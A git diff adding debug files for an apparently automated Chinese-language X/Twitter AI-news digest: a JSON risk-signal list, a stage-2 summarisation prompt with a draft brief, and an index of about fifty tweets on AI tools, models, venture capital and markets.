"https://x.com/GoSailGlobal/status/2049327989951967546" + }, + { + "id": "r2", + "level": "MID", + "title": "Anthropic拒接军方合作,Google签下五角大楼新合同", + "detail": "AI公司军事合作态度分化,Google趁机填补空缺,可能影响未来AI安全叙事", + "url": "https://x.com/GoSailGlobal/status/2049327989951967546" + }, + { + "id": "r3", + "level": "OPP", + "title": "AI项目严重长尾:54%项目零star,Top1%占83% stars", + "detail": "开源AI agent项目严重分布不均,大部分项目缺乏曝光,生态存在价值发现难题", + "url": "https://x.com/GoSailGlobal/status/2049415194372342164" + }, + { + "id": "r4", + "level": "MID", + "title": "VC退出路径收窄:IPO门槛$500M revenue", + "detail": "Harry Stebbings指出当前VC退出选项受限,IPO需$500M revenue才能进行,并购条件愈发苛刻", + "url": "https://x.com/HarryStebbings/status/2049237538901020767" + }, + { + "id": "r5", + "level": "MID", + "title": "SBC稀释风险:股价下跌时3%年化稀释可飙至10%", + "detail": "股权补偿在股价下跌时稀释爆炸,Harry Stebbings警告下行螺旋风险", + "url": "https://x.com/HarryStebbings/status/2049298621951058341" + }, + { + "id": "r6", + "level": "OPP", + "title": "美国房价将迎来调整", + "detail": "Charlie Bilello:房价年增0.7%创新低,卖家数量创纪录高出买家46%,无政府干预房价将下行", + "url": "https://x.com/charliebilello/status/2049306480071873011" + } + ] + } +} \ No newline at end of file diff --git a/data/x_brief/debug/20260429_171514_l1_stage2_input.txt b/data/x_brief/debug/20260429_171514_l1_stage2_input.txt new file mode 100644 index 0000000..44c4089 --- /dev/null +++ b/data/x_brief/debug/20260429_171514_l1_stage2_input.txt @@ -0,0 +1,32 @@ +[meta] + +phase=stage2_finalize + +tweets=120 + + + +[prompt] + +你是“X资讯月报总编”。请基于阶段1草案,输出最终可渲染 JSON(阶段2定稿)。 + +要求: +1) 只输出 JSON 对象,不要 markdown,不要解释文字。 +2) 必须严格使用最终字段: +{ + "headline":"今日一句话总结,<40字,点出主旋律", + "themes":[{"id":"t1","title":"...","subtitle":"...","bullets":["..."],"samples":[{"text":"...","url":"...","handle":"...","date":"..."}]}], + "p0_events":[{"id":"p01","title":"...","meta":"...","summary":"...","url":"..."}], + "top_quotes":[{"id":"q1","quote":"...","speaker":"...","date":"...","note":"...","url":"..."}], + "category_updates":[{"id":"c1","title":"...","subtitle":"...","level":"P0|P1|P2|WARN","items":[{"text":"...","url":"..."}]}], + "risk_signals":[{"id":"r1","level":"HIGH|MID|OPP","title":"...","detail":"..."}] +} +3) 保证 JSON 合法(双引号、无尾逗号)。 +4) 引用 URL 时,优先从“推文索引”中取值;samples/items 尽量带 url。 +5) 数量限制:themes=3, p0_events<=6, top_quotes<=3, category_updates<=6, risk_signals<=6。 + +阶段1草案(JSON): +{"headline": "OpenAI全云部署 + Claude/MCP连接器爆发,AI编程工具生态进入\" agent 网络\"新时代", "themes": [{"id": "t1", "title": "AI 编程工具生态爆发:多连接器 + 多 Agent 协同", "subtitle": "Cursor 3.2、Claude Blender/Fusion连接器、Mozilla统一接口同天上架,agent正在从单点工具进化为可协作的网络", "bullets": ["Cursor 3.2发布:支持/multitask并行子Agent + 跨仓库多根工作区;GPT-5.5登顶CursorBench达72.8%,50%折扣持续至5月2日", "Claude新增9个创意工具MCP:Blender、Autodesk Fusion、Adobe Creative Cloud、Ableton、Splice、Canva、Affinity、Sketchup、Resodium", "Mozilla发布any-llm:统一接口连接所有LLM provider,挑战LiteLLM,发布首日即获1928 stars", "前GitHub CTO团队开源Laguna:33B参数MoE模型,专为Agentic Coding设计,单GPU可运行"], "sample_urls": ["https://x.com/cursor_ai/status/2047764651363180839", "https://x.com/GoSailGlobal/status/2049327853469310984", "https://x.com/berryxia/status/2049247904536428805"]}, {"id": "t2", "title": "OpenAI全云部署 + 开源模型军备竞赛", "subtitle": "微软合作升级解除云限制;Moonshot Kimi k2.6发布;NVIDIA Nemotron Omni开源;国产模型token价格战开打", "bullets": ["OpenAI更新与微软合作:微软仍是主要云伙伴,但OpenAI产品现已可在所有云上使用", "Perplexity将GPT-5.5设为默认编排模型,Kimi k2.6成开源SOTA;NVIDIA Nemotron 3 Nano Omni开源,30B参数支持5种模态", "小米推出百万亿token补贴计划;罗福莉团队送100T tokens grant,表单对中文builder极友好"], "sample_urls": ["https://x.com/sama/status/2048755148361707946", "https://x.com/AravSrinivas/status/2047753276888854595", "https://x.com/berryxia/status/2049253021159403786"]}, {"id": "t3", "title": "AI投资与生存指南:vc视角的务实判断", "subtitle": "Paul Graham:避开前沿实验室的\" blast radius\";Marc Andreessen:AI是文明知识的镜像而非外星机器智能", "bullots": ["Paul Graham:前沿实验室确实在高速发布,但初创公司可以避开它们的攻击范围,关键在于选择正确的细分领域", "Marc Andreessen:预期的AI是血腥的外星机器智能,实际得到的AI是我们文明知识和文化的全面镜像,当然会深深爱上它", "Harry Stebbings:单纯裁员不能解决问题,文化和人才质量才是核心,需全体系重建"], "sample_urls": ["https://x.com/paulg/status/2049333482271260710", "https://x.com/pmarca/status/2049193915249574141", "https://x.com/HarryStebbings/status/2049278741583643076"]}], "p0_events": [{"id": "p01", "title": "Cursor 3.2 /multitask + GPT-5.5可用", "meta": "cursor_ai | 2026-04-24", "summary": "Cursor 3.2新增4大功能:/multitask并行子Agent、多根工作区(跨仓库修改)、GPT-5.5登顶CursorBench 72.8%,50%折扣至5月2日", "url": "https://x.com/cursor_ai/status/2047764651363180839"}, {"id": "p02", "title": "Claude MCP连接器爆发:Blender/Fusion等9个创意工具上架", "meta": "berryxia | 2026-04-28", "summary": "Anthropic同日发布9个MCP连接器,包括Blender(自然语言操控Python API)、Autodesk Fusion、Adobe Creative Cloud等,创意工作流可直接在Claude中完成", "url": "https://x.com/berryxia/status/2049247904536428805"}, {"id": "p03", "title": "OpenAI全云部署,解除微软绑定", "meta": "sama | 2026-04-27", "summary": "OpenAI与微软合作升级:微软保持主要云伙伴身份,但OpenAI产品和API现可在所有云上使用", "url": "https://x.com/sama/status/2048755148361707946"}, {"id": "p04", "title": "Warp终端正式开源", "meta": "berryxia | 2026-04-28", "summary": "知名现代终端Warp宣布全面开源,GitHub/Roadmap/贡献流程全开放,OpenAI Devs担任founding sponsor", "url": "https://x.com/berryxia/status/2049254052840812960"}, {"id": "p05", "title": "AgentSkillsHub索引67,196个项目:基尼系数0.983创纪录", "meta": "GoSailGlobal | 2026-04-29", "summary": "索引GitHub上所有Claude Skill/MCP/开源Agent工具,54.1%项目零star,Top 1%占83% stars,2026年3月新增27,720个项目是2024年月均45倍", "url": "https://x.com/GoSailGlobal/status/2049415194372342164"}, {"id": "p06", "title": "NVIDIA Nemotron 3 Nano Omni开源:30B参数5模态Agent专用", "meta": "berryxia | 2026-04-28", "summary": "256K超长上下文,语言+视觉+语音+视频+音频一体化,专为subagents/Agentic任务设计,完全开源(权重+数据+配方)", "url": "https://x.com/berryxia/status/2049253021159403786"}], "top_quotes": [{"id": "q1", "quote": "The AI we thought we'd get was bloodless alien machine intelligence. The AI we actually got was the complete knowledge and culture of our civilization reflected back at us. Of course we will love it deeply.", "speaker": "Marc Andreessen", "date": "2026-04-28", "note": "a16z联合创始人重新定义AI本质:我们得到的是文明知识的镜像而非外星智能", "url": "https://x.com/pmarca/status/2049193915249574141"}, {"id": "q2", "quote": "Yes it's true that OAI/Ant are shipping at incredible pace, but it's quite easy to avoid their blast radius and build something valuable.", "speaker": "Paul Graham", "date": "2026-04-29", "note": "PG对创始人的建议:避开前沿实验室的攻击范围,选择正确细分领域即可", "url": "https://x.com/paulg/status/2049333482271260710"}, {"id": "q3", "quote": "GPT-5.5 is now available in Cursor! It's currently the top model on CursorBench at 72.8%.", "speaker": "Cursor", "date": "2026-04-24", "note": "GPT-5.5在Cursor编程助手登顶评测榜,CursorBench 72.8%", "url": "https://x.com/cursor_ai/status/2047744579127185843"}], "category_updates": [{"id": "c1", "title": "AI编程工具实测", "subtitle": "Cursor + Claude Code 工作流", "level": "P0", "item_urls": ["https://x.com/cursor_ai/status/2047744579127185843", "https://x.com/berryxia/status/2049247904536428805", "https://x.com/Pluvio9yte/status/2049403423813140571"], "item_texts": ["Cursor 3.2发布/multitask并行子Agent", "Claude Blender MCP一句话操控3D场景", "GPT-5.5登顶CursorBench 72.8%"]}, {"id": "c2", "title": "开源模型生态", "subtitle": "多模态与Agent专用", "level": "P0", "item_urls": ["https://x.com/berryxia/status/2049253021159403786", "https://x.com/berryxia/status/2049250710492160228", "https://x.com/AravSrinivas/status/2047145172337836139"], "item_texts": ["NVIDIA Nemotron 3 Nano Omni开源30B(5模态)", "前GitHub CTO团队开源Laguna 33B MoE", "Moonshot Kimi k2.6成开源SOTA"]}, {"id": "c3", "title": "国产模型与Token补贴", "subtitle": "中文开发者福利", "level": "P1", "item_urls": ["https://x.com/realNyarime/status/2049296454905393361", "https://x.com/runes_leo/status/2049402305217241384"], "item_texts": ["小米百万亿token补贴到账7亿", "罗福莉团队100T tokens grant开放申请"]}, {"id": "c4", "title": "AI编程学习资源", "subtitle": "Skill框架与实操教程", "level": "P1", "item_urls": ["https://x.com/GoSailGlobal/status/2049339826877665496", "https://x.com/GoSailGlobal/status/2049327853469310984"], "item_texts": ["Matt Pocock开源38K stars的Skill框架", "Composio发布awesome-codex-skills即插即用"]}, {"id": "c5", "title": "宏观与市场信号", "subtitle": "能源与房产", "level": "P2", "item_urls": ["https://x.com/charliebilello/status/2049298490489004357", "https://x.com/charliebilello/status/2049306480071873011"], "item_texts": ["伊朗战争以来:航空燃油+70%、布伦特原油+52%、尿素+48%", "美国房价年增0.7%创2023年6月以来最慢,卖家数量创纪录高出买家46%"]}, {"id": "c6", "title": "新终端与开发工具", "subtitle": "Warp开源 + 垂直Tab", "level": "P1", "item_urls": ["https://x.com/dingyi/status/2049304499093946479", "https://x.com/berryxia/status/2049254052840812960"], "item_texts": ["Warp正式开源,重大转折点", "Ghostty离开GitHub,Warp垂直Tab更好用"]}], "risk_signals": [{"id": "r1", "level": "HIGH", "title": "Claude Code系统提示Bug:托管Agent失效+用户token被空转烧光", "detail": "托管Agent因系统提示问题失效,用户token被空转消耗,需密切关注官方修复进展", "url": "https://x.com/GoSailGlobal/status/2049327989951967546"}, {"id": "r2", "level": "MID", "title": "Anthropic拒接军方合作,Google签下五角大楼新合同", "detail": "AI公司军事合作态度分化,Google趁机填补空缺,可能影响未来AI安全叙事", "url": "https://x.com/GoSailGlobal/status/2049327989951967546"}, {"id": "r3", "level": "OPP", "title": "AI项目严重长尾:54%项目零star,Top1%占83% stars", "detail": "开源AI agent项目严重分布不均,大部分项目缺乏曝光,生态存在价值发现难题", "url": "https://x.com/GoSailGlobal/status/2049415194372342164"}, {"id": "r4", "level": "MID", "title": "VC退出路径收窄:IPO门槛$500M revenue", "detail": "Harry Stebbings指出当前VC退出选项受限,IPO需$500M revenue才能进行,并购条件愈发苛刻", "url": "https://x.com/HarryStebbings/status/2049237538901020767"}, {"id": "r5", "level": "MID", "title": "SBC稀释风险:股价下跌时3%年化稀释可飙至10%", "detail": "股权补偿在股价下跌时稀释爆炸,Harry Stebbings警告下行螺旋风险", "url": "https://x.com/HarryStebbings/status/2049298621951058341"}, {"id": "r6", "level": "OPP", "title": "美国房价将迎来调整", "detail": "Charlie Bilello:房价年增0.7%创新低,卖家数量创纪录高出买家46%,无政府干预房价将下行", "url": "https://x.com/charliebilello/status/2049306480071873011"}]} + +推文索引(按 url 可回填 handle/date/text): +[{"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T09:07:13+00:00", "title": "做了 2 个月的事:把 GitHub 上每一个 Claude Skill / MCP server / 开源 Agent 工具都索引下来\n\n数据库现在 67,196 个项目\n\n跑了一遍分布分析,结果让我自己愣了 30 秒:\n\n- 基尼系数 0.983(破 AppStore、npm、YouTube 纪录)\n- 54.1% 的项目是 0 star——不是「少 star」,是 0\n- Top 1% 占走了 83% 的 stars\n- 2026 年 3 月单月新增 27,720 个项目,是 2024 月均的 45 倍\n\n写了一篇 1800 字英文长文讲完所有发现", "url": "https://x.com/GoSailGlobal/status/2049415194372342164"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-04-29T08:43:53+00:00", "title": "R to @realNyarime: 虽然原帖并未提及中国联通,但帖主在评论区提到“联通玩不起”,也害怕被运营商“穿小鞋”因此仅披露运营商未经许可入室查设备,因小区监控不全面而无法取证", "url": "https://x.com/realNyarime/status/2049409325098238125"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-04-29T08:41:13+00:00", "title": "据xhs用户「A信通网络」爆料,长沙联通查PCDN,摸着窗户上的钥匙进门,前前后后来了10多个人,说是什么纪检组的和PCDN专案组的人,还有一堆智家工程师。\n\n原文如下:我们突然收到公司的电话,说我办的业务出问题了。还以为啥大事。我赶紧跑过来,发现客户家里的门开着,以为是客户自己在家里,结果客户并不在家。 [坏笑R]前前后后来了10多个人,说是什么纪检组的和PCDN专案组的人,还有一堆智家工程师。然后我和我们3个领导是最后来的。 客户场景是老小区-1楼一个房间里,拉了8条商务专线+1条商务专线带的二宽。\n那么,这个地方是否有问题呢?我认为是没问题的。因为", "url": "https://x.com/realNyarime/status/2049408651660755063"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T08:40:25+00:00", "title": "R to @GoSailGlobal: 3️⃣ 可以把做的张小龙Agent拉到群组\n\n大家可以圆桌讨论,简单易用", "url": "https://x.com/GoSailGlobal/status/2049408452079046944"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T08:40:22+00:00", "title": "R to @GoSailGlobal: 2️⃣ 每个agent可以GUI自定义大模型、skill、memory\n\n还可以支持第三方模型", "url": "https://x.com/GoSailGlobal/status/2049408436597899361"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T08:40:18+00:00", "title": "R to @GoSailGlobal: 1️⃣ 使用google邮箱登陆\n\n可下载本地软件(最好下载本地) or 网页版使用", "url": "https://x.com/GoSailGlobal/status/2049408421167005763"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T08:40:14+00:00", "title": "被一个二维码拉进了一个 IM 内测群\n\n群里坐着 Codex / Claude Code 实例、张小龙 agent,再加几个真人,大家一起讨论选题\n\nagent 先梳调性,再列大纲,真人在旁边补刀\n\n我做 AgentSkillsHub 看了 67,000+ 个 agent 项目,第一次见有人把 agent 当 IM 里的「一等公民」:不是 bot、不是插件,是好友名单里的成员\n\n它叫 Bloome(http://www.bloome.im),前 Kimi 核心 PM 做的\n\n现在秘密内测中,大家都在看 agent network 该长什么样:一群人,一群", "url": "https://x.com/GoSailGlobal/status/2049408403240571320"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-04-29T08:20:26+00:00", "title": "兄弟们,搞3D的直接冲🤩🤩🤩\n\nClaude上线了Blender MCP连接器,\n自然语言直接操控Blender的Python API,\n调场景、批量改物体、写自定义工具,不用会一行代码,\n\n我之前在Blender写个批量脚本至少折腾半小时,\n现在一句话就搞定了,\n\n更狠的是Anthropic同时砸钱加入了Blender基金会当赞助商,\n这波是总共9个创意工具连接器一起上线", "url": "https://x.com/Pluvio9yte/status/2049403423813140571"}, {"handle": "runes_leo", "name": "Leo", "published_at": "2026-04-29T08:16:00+00:00", "title": "刚学习完罗福莉老师这场 3.5h 访谈发了中文解读,\n转头就刷到她团队在送 100T tokens grant,立马提交申请。\n\n表单做得对中文 builder 极友好:\n工具栏 OpenClaw / Claude Code / Codex 排前三\n模型可勾 Claude / MiMo / DeepSeek / 豆包 / MiniMax 等国产\n\n下一步:把 MiMo V2.5 接进现有 Claude Code 工作流,\n做横向对照实测出公开内容。(如果申请成功的话😆)\n\n听 → 写 → 用 → 传播,一个闭环。\n\n申请入口:http://100t.xi", "url": "https://x.com/runes_leo/status/2049402305217241384"}, {"handle": "CuiMao", "name": "CuiMao", "published_at": "2026-04-29T07:55:14+00:00", "title": "Deepseek好像要发多模态的了,好好睁开眼睛看看这个世界吧!", "url": "https://x.com/CuiMao/status/2049397079177592925"}, {"handle": "CuiMao", "name": "CuiMao", "published_at": "2026-04-29T07:44:33+00:00", "title": "x.com/i/article/204921670329…", "url": "https://x.com/CuiMao/status/2049394392776290573"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-04-29T07:15:58+00:00", "title": "裤袜是裤子还是袜子?", "url": "https://x.com/realNyarime/status/2049387196311105556"}, {"handle": "CuiMao", "name": "CuiMao", "published_at": "2026-04-29T07:09:24+00:00", "title": "😄", "url": "https://x.com/CuiMao/status/2049385544577438121"}, {"handle": "CuiMao", "name": "CuiMao", "published_at": "2026-04-29T07:02:18+00:00", "title": "哈哈。主页刷到很多小朋友拿到了字节的 offer ,恭喜啊,我当时进字节的第一天,乌云遮天,大雨滂沱,电闪雷鸣,预示着一个伟大的产品经理即将孕育而生。😎😎,加油!,每天都是 Day 1", "url": "https://x.com/CuiMao/status/2049383757535490257"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-29T06:32:45+00:00", "title": "看别人天天发商单,还特么疯狂涨粉。\n\n难受了☹️ \n\n是时候,我也要让甲方爸爸来几个单了!\n\n助我一臂之力了嘿嘿😁\n\n在线等啊…", "url": "https://x.com/berryxia/status/2049376324444410138"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-29T06:19:31+00:00", "title": "Cybertruck", "url": "https://x.com/elonmusk/status/2049372990870290940"}, {"handle": "runes_leo", "name": "Leo", "published_at": "2026-04-29T06:15:09+00:00", "title": "x.com/i/article/204902031072…", "url": "https://x.com/runes_leo/status/2049371895267774715"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-29T06:05:35+00:00", "title": "Congrats!", "url": "https://x.com/elonmusk/status/2049369485459832951"}, {"handle": "CuiMao", "name": "CuiMao", "published_at": "2026-04-29T06:04:54+00:00", "title": "呵呵,上个月我说雷总的模型会把价格打下来,一群人喷我懂个 p 的 AI ,今天满屏都是感谢雷总,天地良心,成年人的世界真的他妈的太现实了吧。", "url": "https://x.com/CuiMao/status/2049369313547800804"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-29T06:04:42+00:00", "title": "RT by @elonmusk: Full circle moment: paying for @Starlink with @XMoney 🤝", "url": "https://x.com/elonmusk/status/2049369264914903143"}, {"handle": "lxfater", "name": "铁锤人", "published_at": "2026-04-29T06:02:06+00:00", "title": "用 GPT Image 2 赚钱,你想到几种方式?\n\n我整理了5种,每种都有提示词,拿走能用\n\n但还有一种方式不用自己会出图也能赚!!\n\n有人进货四分钱,卖两毛,自己一张图都不出\n\n闲鱼上已经有人在跑了\n\n其余 5 种看图\n\n完整提示词加自动化流程,请看引用文章👇", "url": "https://x.com/lxfater/status/2049368609193926810"}, {"handle": "naval", "name": "Naval Ravikant", "published_at": "2026-04-29T06:01:47+00:00", "title": "\"Savings Tax.\"", "url": "https://x.com/naval/status/2049368528445403351"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-29T05:57:10+00:00", "title": "RT by @elonmusk: Elon Musk on AI during the OpenAI trial:\n\n\"It (AI) could make us more prosperous, but it could also kill us all. We want to be in a Gene Roddenberry movie, like Star Trek, not so much a James Cameron movie, like Terminator.\n\nHe then elaborated by comparing AI tra", "url": "https://x.com/elonmusk/status/2049367366824305013"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T05:32:52+00:00", "title": "拼接两段 15s的忠犬八公动漫视频\n\n很不错哈", "url": "https://x.com/GoSailGlobal/status/2049361252804427850"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-29T04:57:00+00:00", "title": "OpenAI may no longer be a nonprofit but it continues to be—and may always be—a “never made a profit”", "url": "https://x.com/GaryMarcus/status/2049352224547975422"}, {"handle": "chuxiaeth", "name": "初夏", "published_at": "2026-04-29T04:52:50+00:00", "title": "🧵 最近主攻各平台的嘴撸创作者赛道,不卷且能稳定产出收益。这波参与的是 @MindoAI 和 @useTria 的联合活动 🎯\n\n策略上我依然聚焦推文创作,辅以低磨损的轻交互。活动需要交易量和办卡,门槛确实比纯内容局高,但我不会去死磕资金堆量的维度,找准自己优势位最重要 📊\n\nTria交互链接:http://app.tria.so/?accessCode=3RPJYP7003&utm_source=mindo\n\n排名规则分三块:\n1️⃣ DEX 交易量\n2️⃣ 信用卡办理加消费\n3️⃣ 创作者影响力\n我的打法是主攻第三项,前两项用最小成本蹭基础分,集中火", "url": "https://x.com/chuxiaeth/status/2049351176433623539"}, {"handle": "naval", "name": "Naval Ravikant", "published_at": "2026-04-29T04:45:11+00:00", "title": "R to @naval: Apple: http://apple.co/4cF5VWZ\n\nSpotify: http://open.spotify.com/episode/5C1aTaJwlpkGC7Lj0cqDrx\n\nYouTube: http://youtu.be/hTdSU7q5WCo\n\nTranscript: http://nav.al/code\n\n—\n\nPresented by AngelList: http://angellist.com/podcast", "url": "https://x.com/naval/status/2049349252112089553"}, {"handle": "naval", "name": "Naval Ravikant", "published_at": "2026-04-29T04:45:10+00:00", "title": "New podcast on vibe coding - A Return to Code.\n\nA Return to Coding 00:20\n\nThe Personal App Store 03:17\n\nVibe Coding Is a Video Game with Real-World Rewards 06:22\n\nPure Software Is Uninvestable 10:33\n\nA Place for Each Model 14:22\n\nAI Is Eager to Please 17:57\n\nWhy Math and Coding? ", "url": "https://x.com/naval/status/2049349249905951175"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-04-29T04:39:21+00:00", "title": "未来属于设计 测评 和 运营", "url": "https://x.com/Pluvio9yte/status/2049347785456316549"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T04:07:44+00:00", "title": "Matt Pocock 的 Skill 框架 · 跟其他三家的差异\n\n项目链接:http://github.com/mattpocock/skills · 38K stars · MIT · 单人维护、日活更新\n\n一句话:把资深工程师的纪律装进 Claude Code,让 vibe coder 也能写出能上线的代码。\n\n含 16 个 skill:tdd / diagnose / improve-codebase-architecture / to-prd / to-issues / triage / grill-me / zoom-out / git-g", "url": "https://x.com/GoSailGlobal/status/2049339826877665496"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T03:53:48+00:00", "title": "x.com/i/article/204933030407…", "url": "https://x.com/GoSailGlobal/status/2049336319286063302"}, {"handle": "dingyi", "name": "Ding", "published_at": "2026-04-29T03:49:14+00:00", "title": "我就知道🤣🤣🤣", "url": "https://x.com/dingyi/status/2049335171066061234"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-29T03:42:31+00:00", "title": "RT by @paulg: MIT student asked a question earlier today that a lot of young founders are quietly wondering about:\n\n\"Won’t the frontier labs just do everything?\"\n\nYes it's true that OAI/Ant are shipping at incredible pace, but it's quite easy to avoid their blast radius and build", "url": "https://x.com/paulg/status/2049333482271260710"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-29T03:37:16+00:00", "title": "RT by @elonmusk: The exact same question to Grok 4.3, GPT 5.5, and Claude Opus 4.7:\n\n“Count to 10 starting from 11”\n\nGrok 4.3 wins 🏆\nEvery single time\n\nIt gave 11, 10 and explained why going backwards was the only logical move... The others started counting from 11 to 20\n\nGrok’s ", "url": "https://x.com/elonmusk/status/2049332159601942995"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-29T03:29:10+00:00", "title": "RT by @paulg: What do the smartest kids in the world do when they grow up?\n\nI did the largest study of ~18,000 International Olympiad medalists (IMO, IOI and IPhO) over the last 25yrs, arguably the sharpest analytical minds of the world in high school, to see where they ended up ", "url": "https://x.com/paulg/status/2049330123464393084"}, {"handle": "lxfater", "name": "铁锤人", "published_at": "2026-04-29T03:28:30+00:00", "title": "R to @lxfater: 海报图片提示词 :\n\n请生成一张随机的瑜伽宣传海报拼贴总图。\n整体要求:\n在一张大画面中,随机分隔出 N 张彼此独立的瑜伽宣传海报\n每张卡面尺寸随机设计铺满整张图\n卡面之间用清晰的留白、细边框、拼贴切割线或杂志式分隔结构隔开\n整体像一次抽出了 N 张不同风格的高质量瑜伽宣传海报\n每张海报都要明显不同,具有\"随机抽卡\"的新鲜感和丰富变化\n所有海报统一保持高级、专业、吸引人,适合瑜伽课程宣传、社媒推广、品牌视觉展示\n\n分镜摆姿势提示词:将图一的女性改为图二的4,5姿势,生成图片\n\n视频提示词:根据首尾帧生成丝滑的,就是专业瑜伽演", "url": "https://x.com/lxfater/status/2049329956153352499"}, {"handle": "lxfater", "name": "铁锤人", "published_at": "2026-04-29T03:28:29+00:00", "title": "R to @lxfater: 如何使用Agent 模式 3 步:\n\n选图像模式\n选GPT-2-image\n点 Agent 按钮\n\n利用下面给的提示词,出了分镜图和人设图\n\n接下来,利用分镜图和人设图,我们就可以控制人物动作啦!!\n\n如何做到呢?主要思路就是让摆出开始的瑜伽动作和结束的瑜伽动作(具体如图一所示)\n\n得出首帧和尾帧,直接喂给可灵视频模型,就出上面的视频了\n\n多个视频就可以出系列的瑜伽动作\n\nflowith的高级套餐包含 GPT Image 2 和 Nanobanana 2 flash 无限生成\n需要的可以使用下面链接,注册送积分:https:", "url": "https://x.com/lxfater/status/2049329950495310198"}, {"handle": "lxfater", "name": "铁锤人", "published_at": "2026-04-29T03:28:28+00:00", "title": "做内容运营,生图生视频,你现在还在跑好几个工具吗?\n\n被朋友拉去做瑜伽图,搭了无数工作流\nGPT Image 2 出来后,发现全废了\n\n得重新规划一套,但这几天身体不舒服,没心思搞\n随手把提示词扔进 flowith 试了一下\n\n以为偷懒的结果会很烂,但实际上这个是我最近用的最好的生图agent之一。\n\n它直接出了 12 个瑜伽动作分镜,动作清晰,描述完整\n\n分镜图和人物图来生成出首末两张图片,用视频模式可灵模型,简单的演示视频,一条链路打通,全在一个工具里面\n\nAgent 模式还能联网,生成下周海报日历,日期星期都是对的,普通的生图模型记忆估计2025年", "url": "https://x.com/lxfater/status/2049329944052859141"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T03:20:42+00:00", "title": "4/29 AI 圈速览\n\n• OpenAI 全系正式登陆 AWS:GPT + Codex + 托管 Agent 一并上线\n\n• Anthropic 拒接军方合作,Google 顺势签下五角大楼新合同\n\n• Claude Code 系统提示 Bug:托管 Agent 失效 + 用户 token 被空转烧光\n\n• mattpocock 开源个人 .claude Skills 目录:工程师级实战合集\n\n• Composio 发布 awesome-codex-skills:Codex 跨平台自动化即插即用\n\n• Lovable Vibe Coding 上线 iO", "url": "https://x.com/GoSailGlobal/status/2049327989951967546"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T03:20:09+00:00", "title": "🔥 今日新鲜 Skills 精选 Top 10(4月29日)\n由 http://agentskillshub.top 整理!发现 67000+ AI Agent 工具,每日更新 🚀\n\nMozilla 出手做统一 LLM 接口 + 跨领域 MCP 扩张,今日生态边界被拓得最宽!!!\n\n1️⃣ mozilla-ai/any-llm\n⭐ 1928 | +1928\nMozilla AI 出品——一个接口跟所有 LLM provider 通信,挑战 LiteLLM\n🔗 https://github.com/mozilla-ai/any-llm\n🌐 https://", "url": "https://x.com/GoSailGlobal/status/2049327853469310984"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-29T03:10:50+00:00", "title": "RT by @GaryMarcus: Gary, that was a great article. Wonderful work as always sir. You have been proven accurate once again.", "url": "https://x.com/GaryMarcus/status/2049325506764677608"}, {"handle": "gkxspace", "name": "余温", "published_at": "2026-04-29T03:09:17+00:00", "title": "有做 摄影行业 的朋友吗,有个项目想聊一聊😊", "url": "https://x.com/gkxspace/status/2049325117998592311"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-04-29T02:54:33+00:00", "title": "RT by @realNyarime: 基于大家的评论,看来大家都想要 token,所以这次我打算这样庆祝。\n\n关注我 @aiandcloud 并转发 + 评论这条内容,5 月 8 日开奖, 送 $100 GPT-5.5 API token,有效期两个月。\n如果活动期间到了 2K fo,就再加一个 $200 的名额,万一到 3K 就加个 $300 的也行!\n\n感谢大家的支持!🥰", "url": "https://x.com/realNyarime/status/2049321411420811479"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-29T02:53:39+00:00", "title": "the ability of this man to sell things he doesn’t believe in is truly extraordinary", "url": "https://x.com/GaryMarcus/status/2049321182089081059"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-04-29T02:39:00+00:00", "title": "好消息:沪爷可以去金马了\n坏消息:需要到福建的出入境办大通证(往来台湾通行证)和签注", "url": "https://x.com/realNyarime/status/2049317496361292240"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-29T02:31:21+00:00", "title": "R to @sama: at this point @ajambrosino is mogmogging\n\nenjoy the next few updates", "url": "https://x.com/sama/status/2049315574120055054"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-29T02:27:13+00:00", "title": "Image", "url": "https://x.com/sama/status/2049314532892475791"}, {"handle": "runes_leo", "name": "Leo", "published_at": "2026-04-29T02:16:00+00:00", "title": "群里讨论开源 bot,多数人共识就一句话:赚钱的 bot 没人会开源。\n\n听着像废话,但这个常识在 AI 时代变得尖锐——\n\n以前护城河是\"代码会写\"。现在 github 丢给 AI,几秒钟读完整个架构。重写成本从两个月变成两小时。\n\n护城河从\"代码会写\"变成\"策略会想\"。\n\n这件事我自己也在分层做——\n\npolymarket-toolkit 我开源(仓库https://github.com/runesleo/polymarket-toolkit),它解决的是数据采集、API 调用这类工具层的事。复用价值大,门槛低,开源等于做品牌。\n\nH 系列做市/ta", "url": "https://x.com/runes_leo/status/2049311708330459226"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T01:58:03+00:00", "title": 